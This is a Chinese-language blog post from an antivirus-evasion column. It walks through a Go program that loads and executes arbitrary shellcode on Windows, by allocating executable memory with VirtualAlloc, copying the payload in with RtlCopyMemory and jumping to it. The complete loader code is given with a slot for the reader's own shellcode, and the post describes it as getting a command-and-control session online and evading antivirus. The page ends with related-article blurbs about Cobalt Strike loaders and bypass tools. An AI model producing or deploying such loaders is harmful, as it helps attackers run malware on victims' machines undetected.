基于Go加载shellcode

最新推荐文章于 2024-05-15 10:08:18 发布
最新推荐文章于 2024-05-15 10:08:18 发布
阅读量2k 收藏 6
点赞数 3
分类专栏: 免杀 文章标签: golang windows microsoft
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52091458/article/details/127448228
版权

基于Go加载shellcode

这里通过TideSec的go免杀项目来从0开始学习

首先导个包,需要用到如下几个包。

import (
	"io/ioutil"
	"os"
	"syscall"
	"unsafe"
)

  • io/ioutil 文件操作

  • os 系统操作

  • syscall syscall包含一个指向底层操作系统原语的接口

  • unsafe Go指针的操作非常有限,仅支持赋值和取值,不支持指针运算,可以通过unsafe包来达到效果

这里定义一下变量,然后需要通过syscall来加载两个dll,kernel32.dllntdll.dll

var (
	kernel32 = syscall.MustLoadDLL("kernel32.dll")
	ntdll = syscall.MustLoadDLL("ntdll.dll")
	VirtualAlloc = kernel32.MustFindProc("VirtualAlloc")
	RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory")
	shellcode_buf = []byte{
        shellcodedata
    }
)

然后这里有一个检查报错的函数,如果有报错就退出并打印报错信息。

func checkErr(err error) {
   if err != nil {
      if err.Error() != "The operation completed successfully." {
         println(err.Error())
         os.Exit(1)
      }
   }
}

然后来看下main函数,这里把shellcode赋值过来,然后有个if语句,这里的意思就是说当运行这个程序跟了参数的时候,就从第一个参数读取文件,把文件内容传给shellcode参数。

func main() {
   shellcode := shellcode_buf
   if len(os.Args) > 1 {
      shellcodeFileData, err := ioutil.ReadFile(os.Args[1])
      checkErr(err)
      shellcode = shellcodeFileData
   }
   addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
   if addr == 0 {
      checkErr(err)
   }
   _, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)))
   checkErr(err)
   syscall.Syscall(addr, 0, 0, 0, 0)
}

那么前面的都很简单,重点就在于这两段

 addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)

_, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)))

就来学习一下什么是VirtualAllocRtlCopyMemory

VirtualAlloc

VirtualAlloc文档

image-20220902160438292

这个函数就是用来申请内存空间的。把申请到的内存空间赋给addr,如果有报错信息就赋给err。

image-20220902153843896

第一个参数是申请的内存初始地址,第二个参数是申请的大小,第三个参数是决定怎么去使用这段内存,这里就采用这个MEM_COMMIT | MEM_RESERVE方法,一整段一起用,并且这里写了默认值。然后第四个参数是决定这段内存的属性PAGE_EXECUTE_READWRITE可读可写可执行。

image-20220902160218566

RtlCopyMemory

RtlCopyMemory

image-20220902161214121

第一个参数是决定从哪开始写入数据,第二个参数是填要写入内存的数据,第三个参数是数据的长度

最后通过syscall把这段内存跑起来,然后就成功加载shellcode了。

image-20220902163602357

完整代码

package main

import (
	"io/ioutil"
	"os"
	"syscall"
	"unsafe"
)

const (
	MEM_COMMIT = 0x1000
	MEM_RESERVE = 0x2000
	PAGE_EXECUTE_READWRITE = 0x40
)
var (
	kernel32 = syscall.MustLoadDLL("kernel32.dll")
	ntdll = syscall.MustLoadDLL("ntdll.dll")
	VirtualAlloc = kernel32.MustFindProc("VirtualAlloc")
	RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory")
	shellcode_buf = []byte{
        shellcodedata//填自己的shellcode
    }
)
func checkErr(err error) {
	if err != nil {
		if err.Error() != "The operation completed successfully." {
			println(err.Error())
			os.Exit(1)
		}
	}
}
func main() {
	shellcode := shellcode_buf
	if len(os.Args) > 1 {
		shellcodeFileData, err := ioutil.ReadFile(os.Args[1])
		checkErr(err)
		shellcode = shellcodeFileData
	}
	addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
	if addr == 0 {
		checkErr(err)
	}
	_, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)))
	checkErr(err)
	syscall.Syscall(addr, 0, 0, 0, 0)
}

编译之后,运行即可上线

image-20220902163841137

免杀效果

image-20220902163806304

Le1a
关注
  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
记一次Go语言的学习--shellcode加载器免杀
jjjjj34的博客
04-24 1497
在网上搜了很多关于Go语言的免杀,我也是刚学几天,就做个学习对于GO语言做免杀的记录。
32.远控免杀专题(32)-Go加载shellcode免杀-3种方式(VT免杀率7-70)1
08-03
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!文章打包下载及相关软件下载: ht
探索Windows Shellcode运行器:go-shellcode
gitblog_00090的博客
05-15 231
探索Windows Shellcode运行器:go-shellcode 项目地址:https://gitcode.com/Ne0nd0g/go-shellcode 项目介绍 go-shellcode 是一个专注于Windows平台的Shellcode运行器和相关工具的开源库。它提供了多种API调用和技术,允许你在不同的场景下加载并执行Shellcode,避免了传统远程进程注入的方法。这个项目包括多...
免杀方法(十)GO免杀shellcode加载器 — go-shellcode-loader​
qq_56426046的博客
10-04 2094
GO混淆免杀shellcode加载器AES加密,混淆反检测 过DF、360和火绒。
免杀方法(五)golang加载器cobaltstrike shellcode
qq_56426046的博客
10-04 1902
Go语言目前是最火的编程语言之一,使用go语言编写的加载器,运行shellcode 可以过国内主流杀软,例如360安全卫士、360安全杀毒、火绒、瑞星、金山、 电脑管家。免杀效果很好。而且操作免杀的步骤简单。 项目地址https:/github.com/jax777/shellcode-launch Go语言编译器下载https:/studygolang.com/dlDownloads - The Go Programming Language安装go,下载安装包,傻瓜安装即可。解压下载的项目压缩包,新建6
shellcode免杀工具Go_Bypass的使用
热门推荐
江左盟的博客
02-28 2万+
简介 该工具是由Arks7使用Go语言开发的一个免杀生成器模板,目前可以过国内主流杀毒。 GitHub地址: https://github.com/Arks7/Go_Bypass 用法 使用CobaltStrike生成payload,输出格式为Raw,4.3版本需要勾选X64,如图: 将生成的文件放在Go_Bypass项目目录下,然后执行go env -w GOPROXY=https://goproxy.io,direct配置代理,否则编译报错。然后运行go run main.go,使用默认配置一路回车即
GoPass系列免杀基础(一)_go语言免杀,2024年最新Golang虚拟机原理深入解析
2301_82243440的博客
04-13 919
Shellcode 是可执行的 16 进制机器码,需要执行的话它就需要用到 Shellcode 加载器。Shellcode 加载器的主要功能:开辟内存空间–将 Shellcode 放入内存空间–指针指向 Shellcode 地址执行。以 Goby 的 GoPassPython 插件来说:这个是用 Python 语言作为 Shellcode加载器执行 Shellcode 的,它的步骤:开辟空间–写入内存空间–然后执行。可以尝试放入自己的 Shellcode 执行一下。
基于Java实现的Shellcode加载
最新发布
07-16
【作品名称】:基于Java实现的Shellcode加载器 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【项目介绍】: ava ShellCode Loader...
第六十八课:基于Ruby内存加载shellcode第一季1
08-03
基于Ruby内存加载shellcode第一季 ...本教程介绍了基于Ruby内存加载shellcode的技术,并展示了如何使用Ruby语言来加载和执行生成的shellcode。该技术可以用于APT攻击与防御,msf无文件渗透和msf插件编写等领域。
go-shellcode:将Shellcode加载到新进程中
02-06
壳码这是一个将shellcode作为自己的进程运行的程序,所有程序均来自内存。 这样做是为了击败反病毒检测。用法请记住,只有64位shellcode将在64位进程中运行。 这无法自动检测您的Shellcode架构。 使用msfvenom或...
利用图片隐写术来远程动态加载shellcode1
08-03
本篇文章主要探讨如何利用这种技术将shellcode隐藏在BMP图片中,从而实现远程动态加载,增加隐蔽性和免杀性。Shellcode是攻击者常用的代码片段,通常用于绕过系统安全机制执行特定操作。 首先,我们要了解BMP文件的...
go-shellcode:Windows Shellcode运行程序和支持实用程序的存储库。 应用程序使用各种AP​​I调用或技术来加载和执行Shellcode
04-23
去壳代码 go-shellcodeWindows Shellcode运行程序和支持实用程序的存储库。 应用程序使用各种AP​​I调用或技术来加载和执行Shellcode。 可用的Shellcode运行程序包括: CreateFiber 该应用程序利用Kernel32.dll的Windows 函数在该应用程序的进程中执行shellcode。 当您希望避免远程进程注入并且希望避免调用CreateThread时,这很有用。 此应用程序不利用golang.org/x/sys/windows软件包中的功能。 最重要的区别是此应用程序本身会加载所有必需的DLL和过程,并使用过程的Call()函数。 注意:我还没有找到退出进程的方法,您将不得不手动终止它。 可以使用以下命令在Windows主机上从项目的根目录编译该应用程序: set GOOS=windows GOARCH=amd64;go
Go4aRun:GO中的Shellcode运行程序,其中包含shellcode加密,远程进程注入,阻止dll和欺骗性的父进程
03-20
Go4aRun 用法: 在hideit.go和Go4it.go中更改用于加密的所需密码 在Go4it.go中更改行为选项 更改块dll行为:通过nonms和onlystore变量在“不允许非MS”和“仅存储”之间 更改parentName变量以更改欺骗的父级 更改programPath变量以更改由父级启动的进程,shellcode将注入该进程 更改creationFlags以更改programPath变量的启动行为 通过注释/取消注释部分CreateRemoteThread或QueueUserAPC选择一个过程注入方法 运行hideit(构建或运行)并选择原始shellcode文件 该脚本应将加密的shellcode保存在pkg / shelly中的shelly.go文件中(如果未手动移动到pkg / shelly中) 编译Go4it.go(例如:GOOS = windows GOARCH
Golang的Cobalt Strike Shellcode Loader-Golang开发
05-26
Cobalt Strike Shellcode Loader by Golang Doge-Loader Cobalt Strike Shellcode Loader by Golang 本人github的项目可能目前主要分为两大类, :frog: Frog系列为自动化扫描方向, :dog_face: Doge系列为免杀及内网渗透方向 Doge-Loader为Doge系列中较为重要的项目 :dog_face: 本项目感谢朋友gd, skate_zhu的帮助 :dog_face: Doge-Loader 本项目主要作用为Cobalt Strike的shellcode加载器 项目结构如下: main.go 主程序,用于远程下载shellcode加载(需要自行上传shellcode(bin文件)并且修改源码里的url等参数) xor.go 异或编码解码器 /enhancement 附加功能,主要用于免杀等(需自行在main.go中调用) /enhancement/copy.go 程序自删除与自复制 /enhancement/sandbox.go
第六十八课:基于Ruby内存加载shellcode第一季.docx
09-15
第六十八课:基于Ruby内存加载shellcode第一季.docx
Golang_20: Go语言 外部命令调用(运行 shell 命令)
谢TS的博客
05-27 582
Go 内置的 os/exec 包用于运行外部命令。它包装了 os.StartProcess 以便更轻松地重新映射 标准输入 和 标准输出、将 I/O 与 管道 连接以及进行其他调整。
Shellcode分离加载实现免杀的两种方式(VT免杀率:1/68)
xf555er的博客
05-24 2793
本文详细介绍了如何通过文件加载和远程URL加载方式实现Shellcode分离加载,以规避安全软件的检测。文章首先描述了通过Metasploit Framework生成的shellcode文件加载的过程,并提供了相关的C++代码。为了避免被杀毒软件检测,利用动态API调用和lazy_importer项目进行代码优化。其次,文章讨论了如何通过远程URL加载shellcode,也提供了相应的实现代码。
动态加载 ShellCode绕过杀软
CSDN
08-11 5098
反病毒解决方案用于检测恶意文件,并且通常使用静态分析技术来区分二进制文件的好坏。如果是恶意文件本身包含恶意内容(ShellCode),那么依靠静态分析技术会非常有效,但如果攻击者使用轻量级的stager来代替下载并将代码加载到内存中,会发生什么?事实证明这样做可以绕过大多数杀软的查杀。虽然这种绕过方法并不是新鲜技术,但绕过反病毒软件对于大多数后门来说都是必要的,在这篇文章中,我们将使用virscan作为我们的检测工具,并使用Metasploit生成一些反向的ShellCode作为我们的攻击载荷。
golang golang-pkg-pcre不支持windows_小玩意:golang加载执行shellcode
weixin_39781594的博客
11-29 289
阅读本文大概需要3分钟,置顶公众号哟。shellcode执行前言今天看到一个比较好玩的东西,虽然原理很简单,但是使用golang来做还是挺新鲜,所以还是分享给大家。第一节PoC、Exp、Payload与Shellcode首先说一下PoC、Exp、Payload与Shellcode这几个概念,这在渗透测试中非常常见。PoC,全称”Proof of Concept”,中文“概念验证”,常指一...
python shellcode加载
09-19
### 回答1: Python shellcode 加载器是一个程序,它能够从字节串中动态地加载和执行二进制代码。这种技术通常用于绕过安全措施,因为它可以避免将可疑代码写入硬盘驱动器或在文件中进行存储,而是将其保存在内存中直接执行。 ### 回答2: Python shellcode加载器是一种用Python编写的程序,用于加载和执行Shellcode(一段机器码,通常用于执行系统级操作)的工具。Shellcode加载器通常用于渗透测试、恶意软件开发或安全研究等领域。 Python shellcode加载器的实现主要包括以下几个步骤: 1. 解析Shellcode加载器首先需要解析Shellcode,将其转换为可执行的格式。这包括解析Shellcode的字节序列、指令等。 2. 构建可执行载体:加载器需要构建一个可执行的载体程序,用于将Shellcode加载到内存中执行。这个载体程序可以是Python脚本,也可以是其他编程语言编写的程序。 3. 加载和执行Shellcode加载器将Shellcode加载到内存中,并在适当的内存位置执行Shellcode。为了提高Shellcode的执行效率和稳定性,加载器通常会在内存中申请合适大小的空间,并将Shellcode复制到这个地址。 4. 执行后续操作:一旦Shellcode执行完成,加载器可以根据需要进行后续操作,如输出结果、清理内存等。 Python shellcode加载器的优点在于使用简便、跨平台性好以及Python本身的强大功能。通过使用Python的相关库和模块,可以方便地实现Shellcode加载器,并完成Shellcode加载和执行。此外,Python shellcode加载器还可以与其他工具或环境配合使用,如反射DLL注入、远程执行等,提供更多的功能和灵活性。 总而言之,Python shellcode加载器是一种用Python编写的工具,用于加载和执行Shellcode的程序。它能够方便地解析、加载和执行Shellcode,并提供了更多的灵活性和功能扩展。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Le1a

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值